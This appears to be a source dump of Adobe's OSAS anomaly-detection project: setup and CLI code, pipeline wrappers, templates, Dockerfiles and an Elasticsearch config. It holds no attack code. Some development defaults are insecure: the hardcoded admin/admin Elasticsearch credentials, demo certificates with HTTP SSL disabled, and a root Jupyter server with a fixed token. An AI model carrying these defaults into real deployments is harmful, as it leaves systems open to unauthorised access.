14 |
28 |
29 |
30 |
31 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing
2 |
3 | Thanks for choosing to contribute!
4 |
5 | The following are a set of guidelines to follow when contributing to this project.
6 |
7 | ## Code Of Conduct
8 |
9 | This project adheres to the Adobe [code of conduct](CODE_OF_CONDUCT.md). By participating, you are expected to uphold this code. Please report unacceptable behavior to Grp-opensourceoffice@adobe.com.
10 |
11 | ## Contributor License Agreement
12 |
13 | All third-party contributions to this project must be accompanied by a signed contributor license agreement. This gives Adobe permission to redistribute your contributions as part of the project. [Sign our CLA](http://opensource.adobe.com/cla.html). You only need to submit an Adobe CLA one time, so if you have submitted one previously, you are good to go!
14 |
15 | ## Code Reviews
16 |
17 | All submissions should come in the form of pull requests and need to be reviewed by project committers. Read [GitHub's pull request documentation](https://help.github.com/articles/about-pull-requests/) for more information on sending pull requests.
18 |
19 | Lastly, please follow the [pull request template](.github/PULL_REQUEST_TEMPLATE.md) when submitting a pull request!
20 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | import setuptools
2 | import os
3 |
4 | with open("README.md", "r", encoding="utf-8") as fh:
5 | long_description = fh.read()
6 |
7 | def parse_requirements(filename):
8 | """ load requirements from a pip requirements file """
9 | lineiter = (line.strip() for line in open(filename))
10 | return [line for line in lineiter if line and not line.startswith("#")]
11 |
12 |
13 | setuptools.setup(
14 | name="osas",
15 | version="0.9.3",
16 | author="Multiple Authors",
17 | author_email="boros@adobe.com",
18 | description="One Stop Anomaly Shop",
19 | long_description=long_description,
20 | long_description_content_type="text/markdown",
21 | url="https://github.com/adobe/OSAS/",
22 | project_urls={
23 | "Source Code": "https://github.com/adobe/OSAS/",
24 | "Bug Tracker": "https://github.com/adobe/OSAS/issues",
25 | "Documentation": "https://github.com/adobe/OSAS/docs/"
26 | },
27 | classifiers=[
28 | "Programming Language :: Python :: 3.0",
29 | "License :: OSI Approved :: Apache Software License",
30 | "Operating System :: OS Independent",
31 | ],
32 | packages=setuptools.find_packages("src"),
33 | python_requires=">=3.10",
34 | include_package_data=True,
35 | install_requires=parse_requirements("requirements.txt"),
36 | package_dir={"": "src"},
37 | entry_points = {
38 | "console_scripts": [
39 | "osas = osas.cli:main"
40 | ]
41 | }
42 | )
43 |
--------------------------------------------------------------------------------
/src/osas/core/utils.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | class Tokenizer:
20 | @staticmethod
21 | def tokenize(text, use_chars=False):
22 | if use_chars:
23 | return [ch for ch in text]
24 | else:
25 | toks = []
26 | tok = ''
27 | for ch in text:
28 | if not ch.isalnum() or ch == ' ':
29 | tok = tok.strip()
30 | if len(tok) != 0:
31 | toks.append(tok)
32 | tok = ''
33 | if ch != ' ':
34 | toks.append(ch)
35 | else:
36 | tok += ch
37 | if tok.strip() != '':
38 | toks.append(tok)
39 |
40 | return toks
41 |
--------------------------------------------------------------------------------
/src/osas/io_utils/formatter.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | # object type conversion/formatting utility functions
20 | import ast
21 | import json
22 | import sys
23 |
24 |
25 | def eval_str(x):
26 | try:
27 | return ast.literal_eval(x)
28 | except Exception as e:
29 | fstr = 'osas/io_utils/formatter.py:eval_str()'
30 | print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
31 |
32 |
33 | def dict_to_str(d):
34 | try:
35 | return json.dumps(d)
36 | except Exception as e:
37 | fstr = 'osas/io_utils/formatter.py:dict_to_str()'
38 | print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
39 |
40 |
41 | def str_to_dict(s):
42 | try:
43 | return json.loads(s)
44 | except Exception as e:
45 | fstr = 'osas/io_utils/formatter.py:str_to_dict()'
46 | print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
47 |
--------------------------------------------------------------------------------
/src/osas/cli.py:
--------------------------------------------------------------------------------
1 | # Copyright 2024 Adobe. All rights reserved.
2 | # This file is licensed to you under the Apache License, Version 2.0 (the "License");
3 | # you may not use this file except in compliance with the License. You may obtain a copy
4 | # of the License at http://www.apache.org/licenses/LICENSE-2.0
5 |
6 | # Unless required by applicable law or agreed to in writing, software distributed under
7 | # the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
8 | # OF ANY KIND, either express or implied. See the License for the specific language
9 | # governing permissions and limitations under the License.
10 |
11 | import os
12 | import os.path
13 | import sys
14 | import click
15 | from decouple import config
16 | import warnings
17 |
18 | warnings.filterwarnings("ignore", category=UserWarning)
19 | warnings.filterwarnings("ignore", category=DeprecationWarning)
20 | warnings.filterwarnings("ignore", category=Warning)
21 |
22 |
23 | def app_version(ctx, param, value):
24 | if not value or ctx.resilient_parsing:
25 | return
26 |
27 | from importlib.metadata import version
28 |
29 | osas_version = version("osas")
30 |
31 | click.echo(f"OSAS {osas_version}")
32 | ctx.exit()
33 |
34 |
35 | @click.group()
36 | @click.option(
37 | "--version",
38 | is_flag=True,
39 | callback=app_version,
40 | expose_value=False,
41 | is_eager=True,
42 | help="Show the version and exit.",
43 | )
44 | def main():
45 | pass
46 |
47 |
48 | @click.group()
49 | def ingest():
50 | pass
51 |
52 | if __name__ == "__main__":
53 | # disable all TQDM output
54 | main()
--------------------------------------------------------------------------------
/scripts/config/elasticsearch.yml:
--------------------------------------------------------------------------------
1 | opendistro_security.ssl.transport.pemcert_filepath: esnode.pem
2 | opendistro_security.ssl.transport.pemkey_filepath: esnode-key.pem
3 | opendistro_security.ssl.transport.pemtrustedcas_filepath: root-ca.pem
4 | opendistro_security.ssl.transport.enforce_hostname_verification: false
5 | opendistro_security.ssl.http.pemcert_filepath: esnode.pem
6 | opendistro_security.ssl.http.pemkey_filepath: esnode-key.pem
7 | opendistro_security.ssl.http.pemtrustedcas_filepath: root-ca.pem
8 | opendistro_security.allow_unsafe_democertificates: true
9 | opendistro_security.allow_default_init_securityindex: true
10 | opendistro_security.authcz.admin_dn:
11 | - CN=kirk,OU=client,O=client,L=test, C=de
12 |
13 | opendistro_security.audit.type: internal_elasticsearch
14 | opendistro_security.enable_snapshot_restore_privilege: true
15 | opendistro_security.check_snapshot_restore_write_privileges: true
16 | opendistro_security.restapi.roles_enabled: ["all_access", "security_rest_api_access"]
17 | opendistro_security.system_indices.enabled: true
18 | opendistro_security.system_indices.indices: [".opendistro-alerting-config", ".opendistro-alerting-alert*", ".opendistro-anomaly-results*", ".opendistro-anomaly-detector*", ".opendistro-anomaly-checkpoints", ".opendistro-anomaly-detection-state", ".opendistro-reports-*", ".opendistro-notifications-*", ".opendistro-notebooks", ".opendistro-asynchronous-search-response*"]
19 | cluster.routing.allocation.disk.threshold_enabled: false
20 | node.max_local_storage_nodes: 3
21 | path:
22 | data: /data/elastic/data
23 | logs: /data/elastic/logs
24 |
25 | opendistro_security.ssl.http.enabled: false
--------------------------------------------------------------------------------
/src/osas/pipeline/fetch_data.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import os
20 | import sys
21 |
22 | sys.path.append('')
23 |
24 | from src.osas.pipeline import Pipeline
25 | from osas.data import datasources
26 | from osas.core.interfaces import Datasource
27 | from osas.io_utils import config
28 |
29 |
30 | class FetchData(Pipeline):
31 | ''' class for data fetching '''
32 |
33 | def __init__(self, env: str):
34 | Pipeline.__init__(self, env)
35 | os.environ["UBA_ENV"] = env
36 |
37 | def datasource(self, name: str, load_config: str=None) -> Datasource:
38 | '''datasource generic method'''
39 | dsClass = getattr(sys.modules[datasources.__name__], name)
40 | # get args for datasource
41 | cfg = getattr(sys.modules[config.__name__], name)()
42 | if load_config:
43 | cfg.load(load_config)
44 | ds = dsClass(**(vars(cfg))) # convert obj to dict to kwargs
45 | return ds
46 |
--------------------------------------------------------------------------------
/src/osas/templates/train_pipeline.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
Available datasets in tests folder:
11 | {%for i in range(0, len_dataset)%}
12 |
13 |
{{dataset[i]}}
14 | {%endfor%}
15 |
16 |
Available config in tests folder:
17 | {%for i in range(0, len)%}
18 |
19 |
{{files[i]}}
20 | {%endfor%}
21 |
22 |
Please input a valid config file from the list above
23 |
46 |
47 |
48 |
49 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | dist/
2 | build/
3 | tests/
4 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
5 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
6 | corpus/
7 | # User-specific stuff
8 | data
9 | .idea
10 | .idea/**/workspace.xml
11 | .idea/**/tasks.xml
12 | .idea/**/usage.statistics.xml
13 | .idea/**/dictionaries
14 | .idea/**/shelf
15 |
16 | # Generated files
17 | .idea/**/contentModel.xml
18 |
19 | # Sensitive or high-churn files
20 | .idea/**/dataSources/
21 | .idea/**/dataSources.ids
22 | .idea/**/dataSources.local.xml
23 | .idea/**/sqlDataSources.xml
24 | .idea/**/dynamic.xml
25 | .idea/**/uiDesigner.xml
26 | .idea/**/dbnavigator.xml
27 |
28 | # Gradle
29 | .idea/**/gradle.xml
30 | .idea/**/libraries
31 |
32 | # Gradle and Maven with auto-import
33 | # When using Gradle or Maven with auto-import, you should exclude module files,
34 | # since they will be recreated, and may cause churn. Uncomment if using
35 | # auto-import.
36 | # .idea/artifacts
37 | # .idea/compiler.xml
38 | # .idea/jarRepositories.xml
39 | # .idea/modules.xml
40 | # .idea/*.iml
41 | # .idea/modules
42 | # *.iml
43 | # *.ipr
44 |
45 | # CMake
46 | cmake-build-*/
47 |
48 | # Mongo Explorer plugin
49 | .idea/**/mongoSettings.xml
50 |
51 | # File-based project format
52 | *.iws
53 |
54 | # IntelliJ
55 | out/
56 |
57 | # mpeltonen/sbt-idea plugin
58 | .idea_modules/
59 |
60 | # JIRA plugin
61 | atlassian-ide-plugin.xml
62 |
63 | # Cursive Clojure plugin
64 | .idea/replstate.xml
65 |
66 | # Crashlytics plugin (for Android Studio and IntelliJ)
67 | com_crashlytics_export_strings.xml
68 | crashlytics.properties
69 | crashlytics-build.properties
70 | fabric.properties
71 |
72 | # Editor-based Rest Client
73 | .idea/httpRequests
74 |
75 | # Android studio 3.1+ serialized cache file
76 | .idea/caches/build_file_checksums.ser
77 | *.pyc
78 |
79 | *.DS_Store
80 | .DS_Store
81 |
82 | dist/
83 | osas.egg-info/
84 |
--------------------------------------------------------------------------------
/src/osas/pipeline/detect_anomalies.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import os
20 | import sys
21 |
22 | sys.path.append('')
23 |
24 | from osas.core import anomaly
25 | from osas.io_utils import config
26 | from osas.core.interfaces import AnomalyDetection, Datasource
27 |
28 |
29 | class DetectAnomalies():
30 | ''' class for anomalies detection wrapper methods '''
31 |
32 | def __init__(self, env: str = 'DEV'):
33 | os.environ["OSAS_ENV"] = env
34 |
35 | def detection_model(self, name: str, load_config: bool = False):
36 | '''get model specified by name'''
37 | # get anomaly detection type by name
38 | dmClass = getattr(sys.modules[anomaly.__name__], name)
39 | # get label gen obj
40 | dm = dmClass()
41 | return dm
42 |
43 | def build_model(self, model: AnomalyDetection, dataset: Datasource) -> dict:
44 | return model.build_model(dataset)
45 |
46 | def get_scores(self, model: AnomalyDetection, dataset: Datasource) -> [float]:
47 | return model.__call__(dataset)
48 |
49 | def get_pretrained_model(self, modelName: str, pretrained_data: str) -> AnomalyDetection:
50 | dmClass = getattr(sys.modules[anomaly.__name__], modelName)
51 | return dmClass.from_pretrained(pretrained_data)
52 |
--------------------------------------------------------------------------------
/src/osas/templates/run_pipeline.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
Available datasets in tests folder:
11 | {%for i in range(0, len_dataset)%}
12 |
13 |
{{dataset[i]}}
14 | {%endfor%}
15 |
Available config in tests folder:
16 | {%for i in range(0, len)%}
17 |
{{files[i]}}
18 | {%endfor%}
19 |
Available pipelines in tests folder:
20 | {%for i in range(0, len_pipeline)%}
21 |
22 |
{{pipeline[i]}}
23 | {%endfor%}
24 |
Please input a valid config file from the list above
25 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/docker/osas-elastic/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM debian
2 | ENV APT_KEY_DONT_WARN_ON_DANGEROUS_USAGE=1
3 | RUN apt update && apt install -y gnupg2 curl procps openjdk-11-jdk unzip wget dbus sudo
4 |
5 | RUN wget -qO - https://d3g5vo6xdbdb9a.cloudfront.net/GPG-KEY-opendistroforelasticsearch | apt-key add -
6 | RUN echo "deb https://d3g5vo6xdbdb9a.cloudfront.net/apt stable main" | tee -a /etc/apt/sources.list.d/opendistroforelasticsearch.list
7 | RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-7.10.2-amd64.deb && \
8 | dpkg -i elasticsearch-oss-7.10.2-amd64.deb && \
9 | rm elasticsearch-oss-7.10.2-amd64.deb
10 |
11 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistro-elasticsearch/opendistroforelasticsearch-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
12 | tar -zxf opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
13 | rm opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
14 | mv opendistroforelasticsearch-1.13.0 /elasticsearch && \
15 | chown elasticsearch:elasticsearch elasticsearch -R && \
16 | cd /elasticsearch && \
17 | sudo -H -u elasticsearch bash -c './opendistro-tar-install.sh &'
18 |
19 | RUN curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
20 | RUN echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-7.x.list
21 | RUN apt update
22 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistroforelasticsearch-kibana/opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
23 | tar -xf opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
24 | rm opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz
25 |
26 | # Prepare environment UTF-8
27 | RUN apt-get update && DEBIAN_FRONTEND=noninteractive apt-get install -y locales python3 python3-pip mc nano htop git
28 | RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \
29 | locale-gen
30 | ENV LANG en_US.UTF-8
31 | ENV LANGUAGE en_US:en
32 | ENV LC_ALL en_US.UTF-8
33 |
34 | RUN echo "Cloning OSAS" && \
35 | cd / && \
36 | git clone https://github.com/adobe/OSAS.git && \
37 | mv OSAS osas
38 |
39 | RUN cd /osas/ && \
40 | pip3 install --no-cache-dir -r requirements.txt
41 |
42 |
43 | CMD /osas/scripts/run_services.sh & cd /osas && python3 osas/webserver.py
44 |
45 |
--------------------------------------------------------------------------------
/docker/osas-elastic-jupyterlab/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM debian
2 | ENV APT_KEY_DONT_WARN_ON_DANGEROUS_USAGE=1
3 | RUN apt update && apt install -y gnupg2 curl procps openjdk-11-jdk unzip wget dbus sudo
4 | RUN DEBIAN_FRONTEND=noninteractive apt-get install -y locales python3 python3-pip mc nano htop git
5 |
6 | RUN wget -qO - https://d3g5vo6xdbdb9a.cloudfront.net/GPG-KEY-opendistroforelasticsearch | apt-key add -
7 | RUN echo "deb https://d3g5vo6xdbdb9a.cloudfront.net/apt stable main" | tee -a /etc/apt/sources.list.d/opendistroforelasticsearch.list
8 | RUN wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-oss-7.10.2-amd64.deb && \
9 | dpkg -i elasticsearch-oss-7.10.2-amd64.deb && \
10 | rm elasticsearch-oss-7.10.2-amd64.deb
11 |
12 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistro-elasticsearch/opendistroforelasticsearch-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
13 | tar -zxf opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
14 | rm opendistroforelasticsearch-1.13.0-linux-x64.tar.gz && \
15 | mv opendistroforelasticsearch-1.13.0 /elasticsearch && \
16 | chown elasticsearch:elasticsearch elasticsearch -R && \
17 | cd /elasticsearch && \
18 | sudo -H -u elasticsearch bash -c './opendistro-tar-install.sh &'
19 |
20 | RUN curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
21 | RUN echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-7.x.list
22 | RUN apt update
23 | RUN curl https://d3g5vo6xdbdb9a.cloudfront.net/tarball/opendistroforelasticsearch-kibana/opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz -o opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
24 | tar -xf opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz && \
25 | rm opendistroforelasticsearch-kibana-1.13.0-linux-x64.tar.gz
26 |
27 | # Prepare environment UTF-8
28 | RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \
29 | locale-gen
30 | ENV LANG en_US.UTF-8
31 | ENV LANGUAGE en_US:en
32 | ENV LC_ALL en_US.UTF-8
33 |
34 | #RUN echo "Cloning OSAS" && \
35 | # cd / && \
36 | # git clone https://github.com/adobe/OSAS.git && \
37 | # mv OSAS osas
38 | ADD ./osas /osas/osas
39 | ADD ./docs /osas/docs
40 | ADD ./scripts /osas/scripts
41 | ADD ./resources /osas/resources
42 | RUN mkdir osas/corpus
43 | RUN mkdir osas/data
44 | COPY ./requirements.txt /osas/
45 |
46 | RUN cd /osas/ && \
47 | cat requirements.txt
48 |
49 | RUN cd /osas/ && \
50 | cat requirements.txt && \
51 | pip3 install -U pip && \
52 | pip3 install --no-cache-dir -r requirements.txt && \
53 | pip3 install jupyterlab
54 |
55 | ENV SHELL=/bin/bash
56 |
57 | CMD /osas/scripts/run_services.sh & jupyter lab --ip=0.0.0.0 --allow-root --ServerApp.token=osas # & cd /osas && python3 osas/webserver.py
58 |
59 |
--------------------------------------------------------------------------------
/src/osas/main/train_pipeline.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import optparse
20 | import sys
21 | import json
22 |
23 | sys.path.append('')
24 |
25 | from src.osas.pipeline import Pipeline
26 | from osas.data.datasources import CSVDataSource, Datasource
27 |
28 |
29 | def is_numeric(obj):
30 | attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
31 | return all(hasattr(obj, attr) for attr in attrs)
32 |
33 |
34 | def process(params):
35 | # load and run pipeline
36 | datasource = CSVDataSource(params.input_file)
37 | p = Pipeline('DEV')
38 | p.load_config(params.conf_file)
39 | if params.incremental:
40 | p.load_model(params.orig_model_file)
41 | model = p.build_pipeline(datasource, incremental=params.incremental)
42 | json.dump(model, open(params.model_file, 'w'), indent=4)
43 |
44 |
45 | if __name__ == '__main__':
46 | parser = optparse.OptionParser()
47 | parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
48 | parser.add_option('--conf-file', action='store', dest='conf_file', help='location of pipeline configuration file')
49 | parser.add_option('--model-file', action='store', dest='model_file',
50 | help='location where to store the pretrained pipeline file')
51 | parser.add_option('--orig-model-file', action='store', dest='orig_model_file',
52 | help='location where to store the pretrained pipeline file')
53 | parser.add_option('--incremental', action='store_true', help='perform incremental update on the model (will load '
54 | '--orig-model-file and save at location specified by '
55 | '--model-file)')
56 |
57 | (params, _) = parser.parse_args(sys.argv)
58 |
59 | if params.input_file and params.conf_file and params.model_file:
60 | if params.incremental and params.orig_model_file:
61 | process(params)
62 | else:
63 | if params.incremental:
64 | print("Must specify --orig-model-file")
65 | elif params.orig_model_file:
66 | print("--orig-model-file must be used with --incremental")
67 | else:
68 | process(params)
69 | else:
70 | parser.print_help()
71 |
--------------------------------------------------------------------------------
/src/osas/main/run_pipeline.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import optparse
20 | import sys
21 | import json
22 | from elasticsearch import helpers, Elasticsearch
23 |
24 | sys.path.append('')
25 |
26 | from src.osas.pipeline import Pipeline
27 | from osas.data.datasources import CSVDataSource, Datasource
28 | import numpy as np
29 |
30 |
31 | def is_numeric(obj):
32 | attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
33 | return all(hasattr(obj, attr) for attr in attrs)
34 |
35 |
36 | def process(params):
37 | # load and run pipeline
38 | datasource = CSVDataSource(params.input_file)
39 | p = Pipeline('DEV')
40 | p.load_config(params.conf_file)
41 | p.load_model(params.model_file)
42 | p(datasource)
43 | # save, if necessary
44 | if params.output_file:
45 | datasource.save(open(params.output_file, 'w'))
46 | # push to elasticsearch
47 | if not params.no_elastic:
48 | try:
49 | es = Elasticsearch([{'host': 'localhost', 'port': 9200}], http_auth=('admin', 'admin'))
50 | data = [item for item in datasource]
51 | for item in data:
52 | item['model'] = p._scoring_model_name
53 | item['raw'] = str(item['labels'])
54 | for key in item:
55 | if item[key] == 'NaN' or (is_numeric(item[key]) and np.isnan(item[key])):
56 | item[key] = None
57 | helpers.bulk(es, data, index="anomalies", doc_type="type")
58 | except Exception as e:
59 | sys.stdout.write('Unable to push data to ElasticSearch: {0}\n'.format(str(e)))
60 |
61 |
62 | if __name__ == '__main__':
63 | parser = optparse.OptionParser()
64 | parser.add_option('--input-file', action='store', dest='input_file', help='location of the input file')
65 | parser.add_option('--conf-file', action='store', dest='conf_file', help='location of pipeline configuration file')
66 | parser.add_option('--model-file', action='store', dest='model_file', help='location of pretrained pipeline file')
67 | parser.add_option('--output-file', action='store', dest='output_file', help='output-file (optional)')
68 | parser.add_option('--no-elastic', action='store_true', dest='no_elastic', help='don\'t push data to Elastic')
69 | (params, _) = parser.parse_args(sys.argv)
70 |
71 | if params.input_file and params.conf_file and params.model_file:
72 | if params.no_elastic and not params.output_file:
73 | sys.stdout.write("This run will not produce any results. You need to either specify --output-file or "
74 | "remove --no-elastic\n")
75 | else:
76 | process(params)
77 | else:
78 | parser.print_help()
79 |
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Adobe Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | In the interest of fostering an open and welcoming environment, we as
6 | contributors and maintainers pledge to making participation in our project and
7 | our community a harassment-free experience for everyone, regardless of age, body
8 | size, disability, ethnicity, gender identity and expression, level of experience,
9 | nationality, personal appearance, race, religion, or sexual identity and
10 | orientation.
11 |
12 | ## Our Standards
13 |
14 | Examples of behavior that contributes to creating a positive environment
15 | include:
16 |
17 | * Using welcoming and inclusive language
18 | * Being respectful of differing viewpoints and experiences
19 | * Gracefully accepting constructive criticism
20 | * Focusing on what is best for the community
21 | * Showing empathy towards other community members
22 |
23 | Examples of unacceptable behavior by participants include:
24 |
25 | * The use of sexualized language or imagery and unwelcome sexual attention or
26 | advances
27 | * Trolling, insulting/derogatory comments, and personal or political attacks
28 | * Public or private harassment
29 | * Publishing others' private information, such as a physical or electronic
30 | address, without explicit permission
31 | * Other conduct which could reasonably be considered inappropriate in a
32 | professional setting
33 |
34 | ## Our Responsibilities
35 |
36 | Project maintainers are responsible for clarifying the standards of acceptable
37 | behavior and are expected to take appropriate and fair corrective action in
38 | response to any instances of unacceptable behavior.
39 |
40 | Project maintainers have the right and responsibility to remove, edit, or
41 | reject comments, commits, code, wiki edits, issues, and other contributions
42 | that are not aligned to this Code of Conduct, or to ban temporarily or
43 | permanently any contributor for other behaviors that they deem inappropriate,
44 | threatening, offensive, or harmful.
45 |
46 | ## Scope
47 |
48 | This Code of Conduct applies both within project spaces and in public spaces
49 | when an individual is representing the project or its community. Examples of
50 | representing a project or community include using an official project e-mail
51 | address, posting via an official social media account, or acting as an appointed
52 | representative at an online or offline event. Representation of a project may be
53 | further defined and clarified by project maintainers.
54 |
55 | ## Enforcement
56 |
57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be
58 | reported by contacting the project team at Grp-opensourceoffice@adobe.com. All
59 | complaints will be reviewed and investigated and will result in a response that
60 | is deemed necessary and appropriate to the circumstances. The project team is
61 | obligated to maintain confidentiality with regard to the reporter of an incident.
62 | Further details of specific enforcement policies may be posted separately.
63 |
64 | Project maintainers who do not follow or enforce the Code of Conduct in good
65 | faith may face temporary or permanent repercussions as determined by other
66 | members of the project's leadership.
67 |
68 | ## Attribution
69 |
70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
71 | available at [http://contributor-covenant.org/version/1/4][version]
72 |
73 | [homepage]: http://contributor-covenant.org
74 | [version]: http://contributor-covenant.org/version/1/4/
75 |
--------------------------------------------------------------------------------
/src/osas/templates/config_manual_update.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
15 |
16 |
17 |
18 | {% if not input %}
19 |
Available config files in tests folder:
20 | {% endif %}
21 |
22 | {% if input %}
23 |
Selected config:
24 | {% endif %}
25 |
26 | {% if not input %}
27 | {%for i in range(0, len)%}
28 |
29 |
{{files[i]}}
30 | {%endfor%}
31 | {% endif %}
32 | {% if not input %}
33 |
Please input a valid config file from the list above
34 | {% endif %}
35 |
111 |
112 |
113 |
114 |
--------------------------------------------------------------------------------
/src/osas/pipeline/groom_data.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
